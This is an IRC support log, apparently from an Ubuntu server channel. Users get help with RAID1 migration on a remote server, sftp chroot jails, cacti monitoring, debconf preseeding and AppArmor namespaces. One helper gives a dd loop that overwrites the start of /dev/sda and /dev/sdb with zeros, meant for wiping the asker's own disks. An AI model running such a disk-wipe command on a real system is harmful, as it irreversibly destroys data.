<DaveWM> twb : what all would i have to do to set that up?  i just did apt-get install nxproxy
<twb> I don't use NX, so I cna't help
<DaveWM> ah,  ok,  well thanks for the tip anyway,  looks like a good idea
<demonspork> crap. I can't check snmp from another machine, my other machine is down
<DaveWM> twb : using nx running xterm remotely,  its oddly faster than a normal ssh session to that server ??  heh
<DaveWM> still not really great,  i was hoping to run quassel irc client remotely,  but i think its a bit too resource heavy for that sort of thing on this connection,   i dunno
<twb> If you aren't encrypting NX you probably should be.
<qman__> I prefer the irssi + screen method
<twb> I dunno why you wouldn't just learn irssi and run it in screen on a server
<DaveWM> i like GUI,  heh
<twb> GUIs are for pussies
<DaveWM> i am what i eat
<DaveWM> bare in mind i'm like 70% windows and only 30% linux...   and that 30% has really mostly spawned recently
<sid> hi
<demonspork> so I get graphs that generate and update properly in cacti for localhost users, processes, load and memory
<demonspork> but the graph for my snmp traffic monitoring isn't generating
<_Techie_> has anyone had experience with ioncube loader?
<demonspork> I think it is because I have no idea what to put for Index Value in the Custom Data section of the data source
<cedm> hi
<cedm> can anyone let me know if I can upgrade an EC2 ubuntu server from 9.10 to 10.04 LTS with a plain dist-upgrade?
<cedm> as in the same way as upgrading a local machine?
<cedm> ok... how about just upgrading the kernel via a apt-get update && apt-get upgrade? is it safe? will the server automatically pick up the newest kernel on reboot?
<cedm> nevermind...
<savid> Hi, I have a crontab in /etc/cron.d,  but it doesn't appear to be running.   Any ideas what might keep it from running?   I have a simple test which does not seem to be working:   * * * * * root /bin/echo "TEST" &> /var/log/test.log
<savid> oh nm,  I keep forgetting crontab files can't have "." in the name
<_Techie_> has anyone had experience with ioncube loader?
<DaveWM> twb : apparently i could have saved myself some trouble,  i didnt realize that quassel has a client/core(server) component to it,  so no need to forward the GUI,  just gotta run the client and connect to the core remotely
<twb> Whatever man
<RoAk> kirkland, if I wanted to setup a UEC in VM's, should I use briged networking or with NAT will be enough?
<_ruben> guess i should give up on trying to have dots in my non-fqdn hostname and go for a naming scheme based on dashes or whatever instead
<UweBollsFunder> hi
<UweBollsFunder> I'm planning to install Ubuntu Server in a VM. Does it matter whether I select 32-bit or 64-bit? Are there some packages only made for one but not the other?
<UweBollsFunder> is...uh...anyone around?
<xampart> yes
<UweBollsFunder> I already got my answer in #ubuntu: the 64-bit version would not have run at all in Vmware. Thanks anyway though
<_ruben> 64bits works fine in vmware, *if* your host supports it
<_ruben> then again, vmware's a company, not a product
<UweBollsFunder> Yeah, sorry, I meant  Vmware Workstation , which is a 32-bit program.
<_ruben> UweBollsFunder: doesnt matter either, it depends on if your cpu supports 64bits virtualization extensions (amd-v or intel-vt)
<UweBollsFunder> btw, give a medal to the guy who designed that "Get Ubuntu Server Edition download" page.  3 steps, collapsed by default, with a "Show me how" button that provides screenshots. Page is very minimal but extremely informative.
<UweBollsFunder> ruben: oh, I see. Yeah, mine doesn't, it's a lower-end C2D.
<_ruben> ah
<UweBollsFunder> I can always buy a fancier one if I ever need it
<UweBollsFunder> we'll see how this goes
<UweBollsFunder> how stable is mdadm between upgrades? Is it the sort of software I should never update because it's risker than sticking with the version that created the RAID?
<_ruben> never had any problems myself with mdadm upgrades, ymmv though :)
<UweBollsFunder> allright
<UweBollsFunder> thanks, and gn
<Osmosis>  good mornig everybody
<Osmosis>    somebody know a way to intall a deb package with dpkg that accept console clauses
<Osmosis>    i need install a software remotely and this is a problem
<Osmosis> my doubt is how install an aplication that force to you to acept some clause in the middle of the instalation
<Osmosis>  and i want install remotely and can not accept this clausules
<Osmosis> and i do with a Script, so no option like ssh dpkg or something like that
<_ruben> those things tend to be controlled through debconf, so with debconf-setselections you can pre-set the proper value, might need to use debconf-getselections or the logfiles to find out the proper debconf entry
<Osmosis> _ruben where you from?
<_ruben> .nl
<tom_w> hi... what do i need to create a dyndns like service with bind9? (not update clinet for external service)
<_ruben> tom_w: what is it exactly what you are looking for ?
<Osmosis> ruben what is the name of the package i can not installed
<tom_w> several routers on dsl should be able to change thir subdomain entries on a local DNS server
<tom_w> found a howto... http://idefix.net/~koos/dyndnshowto/dyndnshowto.html
<tom_w> ty
<Osmosis> _ruben already have in my system debconf, that is the aplication? only have one page in the man and dont explain basicaly nothing
<_ruben> Osmosis: debconf-set-selections is installed by defaul, for debconf-get-selections you need to install debconf-utils
<Osmosis> already done thanks
<overlord_tm> My computer need more time every boot to detect LVM drives. On fresh install it booted just fine, then next day i had to change rootdelay to 90 in order to boot. Today even 90s is not enough :/ What could be cause of that? im using 2VG, each on its own md device, using RAID1
<overlord_tm> railing disks?
<overlord_tm> failing*
<kinygos> is it strange that /boot is not on the primary partition flagged as the boot partition?
<twb> kinygos: no
<twb> the bootable flag is ignored by grub
<kinygos> twb: thanks :)
<overlord_tm> how can i check if disk is ok? smartctl? anything else?
<twb> overlord_tm: smartctl can tell the disk to run self-tests
<twb> smartctl on its own is unlikely to find anything
<overlord_tm> what should i do then? i have booted with sysrescuecd and it took 3 minutes to detect logical volumes
<overlord_tm> yesterday 90s was enough, two days ago it booted in seconds
<twb> The command is something like "smartctl /dev/sda -T short"
<twb> The manpage should be clear
<twb> I'd also ask hdparm if it's in DMA5* mode or so, and check dmesg and logfiles for warnings
<overlord_tm> twb, i have just executed long test :)
<twb> Also, maybe you plugged the (external) disk into a USB-1 bus, or you added another device to the machine which slows down the probe cycle
<twb> overlord_tm: do a short test first
<overlord_tm> ok
<overlord_tm> yeah, i did, but it didnt get any faster when i unpluged and rebooted
<twb> There's a small chance that a full power-off will help
<overlord_tm> twb, another thing i noticed was that copy speed was dropping. Yesterday it was bout 40MB/s, today i barely reached 12MB/s
<twb> I don't really care
<sid>  when i try to boot ubuntu 10.04 it gives message mount of filesystem failed CONTROL-D will terminate this shell and retry
<sid> <sid> snd gives prompt
<kinygos> can anyone spare 2 mins to look at my rsync command and tell me if i'm doing something silly (i've rebuilt my server so many times) ?  i'm trying to copy the contents of one disk into a set of raid partitions that i've mounted in /raid/.  what worries me is i'll be doing this on a running system: # rsync -auHxv --exclude=/raid/* /* /raid/
<kinygos> (i spent yesterday trying all sorts of ways to do file copies on a running system and failed miserably)
<overlord_tm> remount read only the filesystem you read from?
<kinygos> it's a remote server...and i don't have access to external media :(
<overlord_tm> using LVM?
<kinygos> i wasn't planning to
<overlord_tm> i never copied files from live system, you never know in which state it was copied
<overlord_tm> i either shutdown or use lvm snapshot
<sid> when i try to boot ubuntu 10.04 it gives message mount of filesystem failed CONTROL-D will terminate this shell and retry
<overlord_tm> sid, have you checked? http://ubuntuforums.org/showthread.php?t=1305434
<RoyK> is there a way to completely disable fb on boot?
<Daviey> SpamapS: When you get this, can you update bug #644587 to state reasons for removal, and the future direction please?
<uvirtbot> Launchpad bug 644587 in drizzle "Please remove drizzle from maverick (was: fails to build from source on maverick)" [High,Confirmed] https://launchpad.net/bugs/644587
<mianosm> Hey guys, could someone tell me why this might happen? http://pastebin.com/uhrrDg8Z
<Babbleback> why when i install an ide drive to use as a back up I get errors on startup about the drives automatically mounted and it stating that the mount points are busy and it doesn't finish starting up?
<Babbleback> haven't had a chance to format and add the new drive to fstab yet because I can't start up with it installed
<Alan> How do i get ubuntu server to automatically get an IPv6 address?
<Alan> I've got an IPv6 router running on my network now, and all the other machines manage it fine...
<Babbleback> should just show up as hda after its recognized in the BIOS correct?
<xfaf> Daviey: about that nmbd bug i havent been able to reproduce it can you?
<uvirtbot> New bug: #652545 in apache2 (main) "package apache2.2-common (not installed) failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/652545
<SpamapS> Daviey: bug 644587 updated
<uvirtbot> Launchpad bug 644587 in drizzle "Please remove drizzle from maverick (was: fails to build from source on maverick)" [High,Fix released] https://launchpad.net/bugs/644587
<Daviey> SpamapS: Awesome... the release team wanted a little more clarification..   it's "Fix Released" now \o/
<SpamapS> yep
<SpamapS> cjwatson: thanks for that btw. :)
<cjwatson> ok
 * SpamapS wonders if cjwatson ever sleeps.
<cjwatson> so does my wife
<ScottK> Want more clarification?
<SpamapS> ScottK: on cjwatson's wife's perception of cjwatson's sleep schedule, or the bug?
<ScottK> I wasn't sure, so I was seeking clarification.
<ScottK> SpamapS: It didn't need to go in the bug, but don't forget once drizzle is in Natty, you can ask for a backport to get it in earlier releases.
<SpamapS> ScottK: I often forget about backports, good point.
<SpamapS> That reminds me that I need to backport the latest moinmoin to lucid
<SpamapS> ScottK: whats the word on backporting something in main, that has new requirements not in main in the targetted release?
<ScottK> SpamapS: Backports doesn't care about Main/Universe.
<SpamapS> sweeeeet
<uvirtbot> New bug: #653020 in apache2 (main) "apache2 crashed with SIGSEGV in T.312()" [Medium,New] https://launchpad.net/bugs/653020
<jetole> join #android
<uvirtbot> New bug: #653027 in clamav (main) "package clamav-freshclam 0.96.1 dfsg-0ubuntu0.10.04.2 failed to install/upgrade: problemas de dependencias - se deja sin configurar" [Undecided,New] https://launchpad.net/bugs/653027
<progre55> hi people. Having a problem creating a directory, although doing it under root priv. and have +w priv for the folder
<progre55> I get "mkdir: cannot create directory `scripts': No such file or directory"
<progre55> the dir /srv is in place
<hggdh> Daviey: just a Q: what about euca-add-user?
<tacomaster> i was wondering because i had read on a ubuntu server  forum that updating regularly is hazardous is that true?
<zoopster> huh? updates are provided because the fix a serious problem or security issue - it's hazardous to NOT update regularly
<tacomaster> zoopster: ok ty because that sounded wrong but its what it said
<mathiaz> JamesPage: o/
<JamesPage> mathiaz: o/
<mathiaz> JamesPage: have you worked around the couchdb issue for the iso testing system?
<JamesPage> mathiaz: yes but not much success - unable to get vm's to boot of a cloud hosted instance.
<mathiaz> JamesPage: how does it fail?
<JamesPage> mathiaz: gPXE randomly can't get files from the server - I can screenprint some of the errors if that would be helpful
<mathiaz> JamesPage: yeah - if you can easily reproduce them
<mathiaz> JamesPage: I'd have a look at the error messages
<JamesPage> mathiaz: I'll spin one up now :-)
<JamesPage> mathiaz: current hudson cloud instance is setup to configure the couchdb instance on a per slave basis so easy to change :-)
<mathiaz> JamesPage: hm - what do you mean?
<mathiaz> JamesPage: is there a couchdb running on each slave now?
<JamesPage> mathiaz: pinged you and email a few minutes ago - take a look
<mathiaz> JamesPage: ah - minutes...
 * mathiaz gets new email
<JamesPage> mathiaz: basically each slave can be configured to point at different couchdb instance so can be localised if need be
<mathiaz> JamesPage: nice
<mathiaz> JamesPage: I think we should move couchdb to each slave for now
<JamesPage> mathiaz: also takes quite a long time to upload initrd and kernel on my adsl to the cloud!
 * mathiaz nods
<mathiaz> JamesPage: eventually we'll look at getting rid of couchdb
<mathiaz> JamesPage: but for now everything is glued together
<mathiaz> JamesPage: and it seems that running couchdb on the slave is the easiest workaround for now
<JamesPage> mathias: agreed and it works; current successful tests where run in this way.
<JamesPage> *mathiaz:
<JamesPage> mathiaz: just tricky on desktop installs as conflicts with desktop-couch
<mathiaz> JamesPage: I've just read your email
<mathiaz> JamesPage: so it seems that local couchdb is the way to go for now
<mathiaz> JamesPage: IMO it makes much more sense
<mathiaz> JamesPage: that way (ie local couchdb)
<JamesPage> mathiaz: I agree - keeps the test execution completely local with control in the master.
<mathiaz> JamesPage: I'll try to setup a second slave on monday
<mathiaz> JamesPage: it may be interesting to have an option to set whether to upload artifacts or not
<mathiaz> JamesPage: I plan to setup my hudson slave on a server running in a DC
<mathiaz> JamesPage: so uploading artifacts shouldn't take so much time
<mathiaz> JamesPage: however for a DSL connection it may be better
<JamesPage> mathiaz: suspect it gets more that 400Kbps upload!
<mathiaz> JamesPage: or may be skip some artificats
<mathiaz> JamesPage: IIUC initrd and kernel are the biggest files
<mathiaz> JamesPage: how about not uploading these to the hudson master
<JamesPage> mathiaz: makes sense - they don't add huge value
<mathiaz> JamesPage: all the other files are smaller - it shouldn't take that much time
<mathiaz> JamesPage: and we'd still have some debugging information in case
<JamesPage> mathiaz: OK - I will work on this on Monday before you try your slave setup
<mathiaz> JamesPage: great - is the trunk up-to-date?
<JamesPage> I'll push at the end of today (so next 10 minutes)
<tacomaster> quick question people keep saying that samba is best for sharing if you have windows computers in your network but what if i only have ubuntu linux computers and no windows computer is there a better file sharing software out there?
<mathiaz> JamesPage: great - could you update the TODO file with the discussion point above?
<mathiaz> JamesPage: to summarize:
<mathiaz> JamesPage: 1. update documentation to outline couchdb setup on slave instead of master
<mathiaz> JamesPage: 2. don't upload kernel and initrd as artifacts
<mathiaz> JamesPage: that's all?
<JamesPage> mathiaz: yep - no problem - I think that covers it.
<kinygos> tacomaster: i'm not an expert here (they're all kinda busy with maverick) so my noobish answer is NFS
<mathiaz> JamesPage: excellent - keep up the good work!
<tacomaster> kinygos: lol its fine if there busy i will probally figure it out sooner or later and ty for the advice on NFS :P
<kinygos> tacomaster: here's a page that may shed some light for you https://help.ubuntu.com/community/SettingUpNFSHowTo
<tacomaster> kinygos: lol funny i had just found the page on google as you linked it
<kinygos> tacomaster: lol..sorry, i was a bit slow :)
<tacomaster> kinygos: lol no reason to be sorry ty for the consideration
<JamesPage> mathiaz: TODO updated and branch now up-to-date in LP.
<sh00ter> hi all
<mathiaz> JamesPage: awesome!
<JamesPage> mathiaz: :-( it took a really long time but my test PXE boot from ec2 is actually working now.
<JamesPage> mathiaz: they where failing before.....
<mathiaz> JamesPage: oh well
<mathiaz> JamesPage: given that you've got a working setup with couchdb on the slave
<mathiaz> JamesPage: it doesn't really matter now
<mathiaz> JamesPage: couchdb running on the slave makes more sense anwyay
<JamesPage> mathiaz: will you be using -server for your slave install?
<mathiaz> JamesPage: I'm not running the desktop edition on the system I plan to convert to a hudson slave
<mathiaz> JamesPage: (if that's what you meant?)
<JamesPage> mathiaz: thats great - allows you to avoid the desktop-couch conflict
<kinygos> does grub want to mount the / or /boot partition?  (grub legacy)
<Daviey> ScottK: Regarding bug #651138 , zul said he would look at it today.
<uvirtbot> Launchpad bug 651138 in likewise-open "likewise-open fails to build from source in maverick" [High,Confirmed] https://launchpad.net/bugs/651138
<ScottK> Daviey: Thanks.
<kentb> does anyone know how to overcome the automated install error during an automated install of a Node Controller?: "The file needed for preconfiguration could not be retrieved from http://#2 192.168.123.10:8774/preseed/preseed.conf"
<kentb> my cc, clc, walurs, & ss are all on the same node
<kentb> or machine rather
<SpamapS> kentb: thats a very odd url its showing
<SpamapS> http://#2 192.168.123.10:8774/preseed/preseed.conf
<SpamapS> kentb: maybe a type-o in the configuration?
<kentb> yeah, this about the only related bug I could find on it, but, I don't have more than one CC on my network:  https://bugs.launchpad.net/ubuntu/+source/eucalyptus/+bug/524147
<uvirtbot> Launchpad bug 524147 in eucalyptus "UEC NC failed to fetch preseed.conf from CC using lucid-server-amd64-20100218" [Medium,Invalid]
<kinygos> is there an easy way to completely wipe a physical disk?  i'm still trying to get raid on my live box, and when i ask my isp to reset the box, they only reset the first disk
<kinygos> live box?  i meant remote server
 * RoyK can't wait to get his hands dirty on the new 120TB boxes arriving next week
<SpamapS> kinygos: lol.. still?
<RoyK> kinygos: dd?
<kinygos> SpamapS: you have no idea :(  i've found articles that make it sound like it should be easy, like http://nixcraft.com/getting-started-tutorials/432-setting-up-raid-1-mirroring-running-remote-linux-system.html, but i fail at the first step
<RoyK> kinygos: how many drives?
<kinygos> RoyK: 2 physical disks
<RoyK> kinygos: sd[ab]?
<SpamapS> kinygos: you were doing so well last time. Where did it fail this time?
<kinygos> RoyK: yep
<kinygos> SpamapS: installing grub...
<SpamapS> kinygos: nobody could help you in here?
<kinygos> SpamapS: everyone seemed busy, so i've been searching online...
<RoyK> kinygos: boot on an install cd, switch to console two after the drivers have been loaded, for dev i a b; do dd if=/dev/zero of=/dev/sd$dev bs=1M count=1k; done
<RoyK> kinygos: boot on an install cd, switch to console two after the drivers have been loaded, for dev in a b; do dd if=/dev/zero of=/dev/sd$dev bs=1M count=1k; done
<RoyK> even
<kinygos> RoyK: unfortunately, that's my challenge...it's a remote server, and i don't have access to any external media :(
<uvirtbot> New bug: #652815 in eucalyptus "eucalyptus-common 2.0+bzr1241-0ubuntu4 not configured after package upgrade" [Undecided,New] https://launchpad.net/bugs/652815
<kinygos> RoyK: but that command is useful to blat my sdb at least :)
<kinygos> shall i post to ubuntuforums, or is that a form of cross-posting given that i've been asking for help in here?
<RoyK> kinygos: explain your setup, please
<SpamapS> RoyK: he's got a lame hosting provider that will only image his box, no install media possible.
<SpamapS> RoyK: so we were trying to walk him through creating a broken raid1, copying everything to it, then booting off it
<SpamapS> kinygos: so how eactly did it fail to install grub?
<SpamapS> exactly rather
<RoyK> ah - right - I remember from last night
<SpamapS> been like 3 days now
<kinygos> RoyK: i'm just having it rebuilt now. as SpamapS says, i have a dedicated server with 9.04 on one disk.  a second disk is installed, but not mounted or partitioned.
<kinygos> SpamapS: here's the last set of steps i took: 1. copied partition layout from sda to sdb with sfdisk -d /dev/sda | sfdisk --force /dev/sdb
<RoyK> kinygos: then run dd to erase that drive and try to create a broken mirror there
<kinygos> SpamapS: 2. changed partition types to raid auto with # for partition in 1 5 6 7 8; do sfdisk --change-id /dev/sdb $partition fd; done
<uvirtbot> New bug: #653152 in dovecot (main) "package mail-stack-delivery 1:1.2.12-1ubuntu7 failed to install/upgrade: subprocess new pre-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/653152
<kinygos> RoyK: here's where i've had a lot of confusion...sda has a swap partition and an extended partition that contains 4 logical partitions...
<kinygos> RoyK: so originally i was trying to mirror the disk, i'm now trying to mirror each partition
<RoyK> kinygos: I don't think you can create a mirror of an existing non-mirrored partition or disk
<RoyK> kinygos: just get the data over, install grub, try to boot on the new broken mirror
<kinygos> RoyK: that's what i thought...so that's what i've been trying to do, but i failed to install grub...
<kinygos> SpamapS: 3. i created corresponding raid partitions with # for partition in 1 5 6 7 8; do mdadm --create /dev/md$partition --level=1 --raid-disks=2 missing /dev/sdb$partition; done
<RoyK> kinygos: try over, please, first dd zeros over the first gigabyte or so on the secondary drive, then make new partitions and so on there, copy the data, try to install grub
<SpamapS> kinygos: sounds great
<kinygos> RoyK: ok, that's what i'm doing just now
<RoyK> yeah, sounds good
<kinygos> apologies all in this channel, i should've put this in a pastebin
<RoyK> it's just a line
<RoyK> no problem
<SpamapS> kinygos: All of that sounds right. So that should have created empty partitions. the next step would have been to mkfs/mkswap on them
<RoyK> multiline pastes should go to pastebin
<RoyK> at least > 3
<kinygos> Spamaps: yep..that's what i did, # mkswap /dev/md1
<kinygos> # for partition in 5 6 7 8; do mkfs.ext3 /dev/md$partition; done
<RoyK> kinygos: I think you should use ext2 for /boot
<kinygos> RoyK: /boot on sda is ext3, i was going like-for-like
<RoyK> just use ext2 - well - just in case
<kinygos> ok
<RoyK> some grub versions are a bit, well, grubby
<kinygos> lol
<kinygos> SpamapS: so next i created a directory /raid, mounted /dev/md1p6 in there, then created /raid/var, /raid/home, and /raid/boot, and mounted the corresponding /md1p partition
<kinygos> partitions
<kinygos> SpamapS: then attempted to copy all data with rsync -auHxv --exclude=/raid/* /* /raid/
<RoyK> kinygos: just use /, not /*
<RoyK> in case there are hidden files around
<kinygos> RoyK: excellent :)
<RoyK> and -u is not needed in this
<kinygos> SpamapS: sorry, i missed 2 steps before i did the copy...
<RoyK> also, with -x, you'll only copy the root fs
<RoyK> so you need to rsync each fs
<RoyK> and then you won't need to exclude /raid, since -x does that
<kinygos> oh, i wonder if that's why it hasn't worked
<RoyK> kinygos: but so far it looks good, just man rsync first :Ã¾
<kinygos> before the copy, i did 2 other things, one of which i don't understand (...)
<RoyK> kinygos: what was that?
<kinygos> RoyK: 1. mdadm -Es >>/etc/mdadm/mdadm.conf (which i think puts the uuid of the raid disk into the conf file)
<RoyK> pastebin mdadm.conf
<kinygos> RoyK: 2. update-initramfs -u (which i have no idea what it does)
<RoyK> normally mdadm.conf won't be needed
<RoyK> that's normally read from the drives in recent kernels (after y2k or so?)
<kinygos> RoyK: my server is currently being rebuilt, so i won't have any files for a bit
<RoyK> kinygos: you probably won't need to update-initramfs since you copy the bunch over
<uvirtbot> New bug: #653154 in dovecot (main) "package mail-stack-delivery (not installed) failed to install/upgrade: subprocess new pre-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/653154
<RoyK> update-initramfs updates the drivers database, the drivers loaded before the root fs is mounted
<kinygos> RoyK: at last, a straightforward description of what that does :) thanks!!
<RoyK> or - well - it creates a cpio archive of needed drivers
<RoyK> but still the same, really
<RoyK> anyway - your initrd file resides in /boot and will be copied if you copy that filesystem with rsync
<kinygos> so once i'd copied all the data over, at least i thought i had, but it seems i hadn't because of the -x switch, i tried to install grub on the second harddisk
<RoyK> kinygos: chrooting into /raid might help a lot
<RoyK> chroot /raid
<RoyK> then check if things look familiar
<RoyK> from there, install grub
<RoyK> onto /dev/sdb
<kinygos> ok..that may have been the issue...when i launched grub, i called root (hd1), then setup (hd1) which failed
<kinygos> i then rebooted and escaped into the grub menu there...
<kinygos> i entered find /boot/grub/stage1 and got file not found...which baffled me because i can still boot into the first disk
<RoyK> well, try again with chroot
<kinygos> RoyK: but what you've suggested sounds right, so i'll do that and report back...it may be a while as i need to wait for the re-imaging to be complete, but thank you very much for your time and advice...i really appreciate it
<RoyK> np :)
<RoyK> kinygos: can you pastebin 'mount' now?
<kinygos> RoyK: what do you mean?  the mount commands i was using?
<kinygos> RoyK: or the output from running mount?
<RoyK> just which filesystems are mounted where - the output of 'mount'
<kinygos> RoyK: my server is being rebuilt, apologies :(
<kinygos> brief afk..real life issue
<Dravekx> oh cool. i didnt know this was a channel lol
<MTecknology> Dravekx: they can get kinda whiny over there ;)
<MTecknology> just ask your question though - no need to ask to ask
<Dravekx> I have lamp setup on ubuntu server and want to jail users in their home directories so they can create web pages in a certain directory. how can I do this and can someone help me set this up?
<Dravekx> not sure I said that right.
<Dravekx> I want to allow each user to have a folder ( say public_html ) that, when they go to the web and point to foo.com/~user  it will display the contents of /home/user/public_html/
<Dravekx> Ive had this setup before, but my server crashed and bought a new one.
<Ekips> http://heriman.wordpress.com/2008/08/05/enabling-apache-user-home-public_html-directory-in-ubuntu/
<Ekips> I guess that's the easiest way ;)
<Dravekx> Ekips, ahhh!! that looks right!! thanks. :)
<Ekips> np :)
<Dravekx> any idea how I can jail users over ssh so they cant login and cd around the server?
<patdk-wk> dravekx, ya, use ssh
<patdk-wk> and do you actually mean jail? not chroot
<patdk-wk> cause, ssh logs in users, that is all it does
<patdk-wk> or did you mean scp/sftp?
<Dravekx> patdk-wk, scp/sftp :)
<Dravekx> sorry lol
<patdk-wk> well, sftp is easy, scp not so much
<patdk-wk> scp is just normal ssh really
<patdk-wk> it's easy to chroot users, using sshd.config
<Dravekx> patdk-wk, honestly, when I create a user, I want them to have access and view to nothing but their home directories
<patdk-wk> http://www.howtoforge.com/chrooted_ssh_howto_debian
<patdk-wk> that is old
<patdk-wk> I wonder if ubuntu has a new enough ssh for this in lucid, I haven't checked
<Dravekx> I found this one, but not sure if it's what I'm talking about: http://www.marthijnvandenheuvel.com/2010/03/10/how-to-create-a-chroot-ssh-user-in-ubuntu/
<patdk-wk> actually, that url I posted wasn't the one I thought it was :)
<patdk-wk> http://blogs.techrepublic.com.com/opensource/?p=229
<patdk-wk> that was more what I was looking for
<patdk-wk> and it looks like lucid sshd is good
<Dravekx> ahhhh
 * RoyK can't wait to get his hands dirty on the new 120TB boxes arriving next week
<Dravekx> that's a lot of space
<kinygos> RoyK: i'm not sure if you still have time, but my server has been reimaged, and i've pasted output from mount, fdisk -l, and cat /etc/fstab here http://dpaste.com/251612/
<RoyK> kinygos: I don't get it - why aren't the md devices mounted?
<kinygos> RoyK: this is the initial setup, i haven't done anything to it yet...
<uvirtbot> New bug: #332156 in kvm (main) "Network issues with hardy guests/hosts, using default nic and virtio" [Medium,Fix released] https://launchpad.net/bugs/332156
<RoyK> kinygos: you obviously need to mount the md devices before you can copy anything to them, don't you think?
<kinygos> RoyK: ofc :) i'll do that now and run the commands again...brb
<RoyK> kinygos: just make sure /raid isn't full of old crap first
<RoyK> kinygos: you don't want that if it's not on a separate filesystem, do you?
* You're now known as ubuntulog
<kinygos> RoyK: indeed
<kinygos> RoyK: i've just mounted my raid partitions, i've not called chroot yet...my mount and fdisk -l output can be seen http://dpaste.com/251617/
<kinygos> off topic, i know...but i just saw this, very funny, reckon peeps in here may appreciate the humour http://www.youtube.com/watch?v=FL7yD-0pqZg
<Dravekx> patdk-wk, I set it up as followed and now my users get this error: Error skipping startup message. Your shell is probably incompatible with this application (BASH is recommended)
<Dravekx> :S
<qman__> Dravekx, not sure what you're doing, but ubuntu's default shell is actually dash, so specify bash if you can
<patdk-wk> actually, that example only works for sftp
<Dravekx> qman__, Im trying this: http://blogs.techrepublic.com.com/opensource/?p=229
<patdk-wk> as I said, scp is really normal ssh, so to limit scp, you would have to limit the shell itself
<Dravekx> its not working for sftp
<Dravekx> keeps giving the error
<qman__> I have that set up on one of mine
<patdk-wk> I'm using it too
<Dravekx> I'll double check.
<qman__> IIRC /bin/false is not ok
<qman__> try /sbin/nologin instead
<qman__> my users are configured that way, so I'm pretty sure that's what I ran into
<Dravekx> almost. SFTP is saying 'access denied' now and refusing the user password.
<Dravekx> maybe permissions?
<qman__> could be
<qman__> there's an odd stipulation that the user's home directory must be root-owned
<patdk-wk> I forget, been a few years since I set mine up :)
<qman__> and not writable by anyone else
<Dravekx> nope. access denied.
<Dravekx> I set the user home to root:root
<Dravekx> what's the default for user shell access?
<Dravekx> nvm I got it
<kinygos> RoyK: i've just tried to install grub after chroot to my mounted drive, and i get the error /dev/sdb: Not found or not a block device...
<silentwater77> hi ,  i would like to run apparmor on an openvz container(vps at my hoster). but the great google-oracle told me it's not possible. same with selinux. When this is true, which alternatives are possible
<jjohansen> silentwater77: it is possible
<jjohansen> but it requires some work on your part
<jjohansen> silentwater77: which version of ubuntu
<uvirtbot> New bug: #653248 in php5 (main) "package php5-common (not installed) failed to install/upgrade: Unterprozess dpkg-deb --control gab den Fehlerwert 2 zurÃ¼ck" [Undecided,New] https://launchpad.net/bugs/653248
<silentwater77> 10.04
<silentwater77> minimal 32 bit
<jjohansen> silentwater77: okay, the problem is that the setup tools aren't in place
<jjohansen> and the maverick kernel supports this better
<jjohansen> but either should work
<silentwater77> i looked everywhere. in openvz forums i read that apparmor wont be supported
<jjohansen> right they don't support at the moment
<jjohansen> and probably won't until some more base work is done
<jjohansen> and then we can propose a patch for openvz
<jjohansen> silentwater77: basically apparmor has the concept of profile namespaces
<silentwater77> i understand. you telling me thats even possible maed my day
<jjohansen> you create a new namespace and then launch the container in it
<jjohansen> the container then loads its profiles into the namespace
<jjohansen> there is work on a pam_module to do this setup for you and a few other tools but its not done yet so it is all very manual atm
<silentwater77> i understand. the thing is i dont have access to the host system as i just rent a vps
<jjohansen> Ah
<jjohansen> well that is a problem atm
<jjohansen> maybe
<jjohansen> it is possible to create a new namespace within the container, but its more tricky
<jjohansen> namespaces are inherited so having it setup before the container is created is ideal
<silentwater77> hmm...maybe i better wait then and until its possible i have to chroot everything
<jjohansen> but with a little hackery it could be done in early boot
<jjohansen> silentwater77: oh and the same thing can be done with chroots, where the chroot gets its own namespace, and can load its own profiles
<jjohansen> but again its hackery atm
<jjohansen> silentwater77: Natty should have much better support for this as that is when the tools are scheduled to land
<silentwater77> hackery isnt my thing right now. im pretty new to linux, but willing to learn
<jjohansen> alright, if you have AA questions feel free to ping me, or ask on #apparmor on irc.oftc.net
<silentwater77> thank you! i really appreciate your help
<silentwater77> have you got a link to some AA hackery at early boot reading for me ?
<jjohansen> silentwater77: no, I'd have to make it up as I went, its something I've meant to get to writing but have not gotten around to yet
<jjohansen> silentwater77: the best place to do it would be in the initramfs as part of startup before upstart gets started, so that upstart is in the new namespace and all of its children
<jjohansen> so it is not the simplest of hackery
<silentwater77> ok, this tells me i really should keep my hands off... i had enough trouble with starting mysql by upstart after reboot
<silentwater77> anyway, i really thank you for your help!
<raubvogel> In which of the 3 named.conf files do I put the acls in?
<ryuchao009> hello
<_Techie_> is there any major security flaws with webmin, that i should be worried about... im already making it so that you cant access the port directly, and forcing SSL on all connections
<demonspork> I have a single physical interface with 5 IP adresses, each IP has various uses and users and I want to monitor and possibly graph usage statistics for connections made to each of these IP addresses
<demonspork> what would be the simplest way to do this?
<demonspork> I am working with cacti right now, and the learning curve is turning out to be quite the obstacle
<demonspork> HOW IS SHOT GRAPH?
<patdk-wk> cacti defently is not user friendly
<demonspork> yeah, but so so powerful
<patdk-wk> atleast when you need to build something custom from scratch
<patdk-wk> I find munin more powerful and friendly :)
<demonspork> munin
<patdk-wk> I only use cacti when I have to, and just drop in preformed packages
<demonspork> how quickly do you think I could go from setup to monitoring traffic on a per IP basis instead of a per Port basis
<patdk-wk> that all depends on how long it takes you to setup iptables rules, and a script to collect that data
<demonspork> per physical port
<demonspork> oh, so iptables is used to log the traffic with that setup?
<patdk-wk> personally, I use shorewall, so I use the shorewall munin script, and make shorewall accounting rules
<patdk-wk> no, iptables is used to count the traffic
<demonspork> k
<demonspork> well, iptables is another thing I am still learning, as I haven't used it much because the server I ran in my dad's office for years was behing an NAT firewall and I just used port fowarding through that to provide services
<demonspork> behind*
<demonspork> now I have an internet facing box and I am actually having to learn some more stuff
<patdk-wk> dunno, I did iptables and ipchains by hand for years
<patdk-wk> but shorewall is so much simpler
<demonspork> I have a giant stack of pepsi cans
<patdk-wk> and makes reading and accounting for changes, so much easier
<demonspork> well, imma learn iptables first I think because it is the most widely used and would be useful to know
<demonspork> and then I might switch to other options once I am comfortable with iptables
<patdk-wk> hmm, it doesn't matter
<patdk-wk> everything uses iptables
<patdk-wk> shorewall is just a script that creates the iptables commands for you
<demonspork> ah
<patdk-wk> you can always look at the iptables stuff manually if you wish, I do often
<demonspork> well, everything uses iptables except for ufw
<patdk-wk> like, ubuntu's ufw
<jdstrand> ?
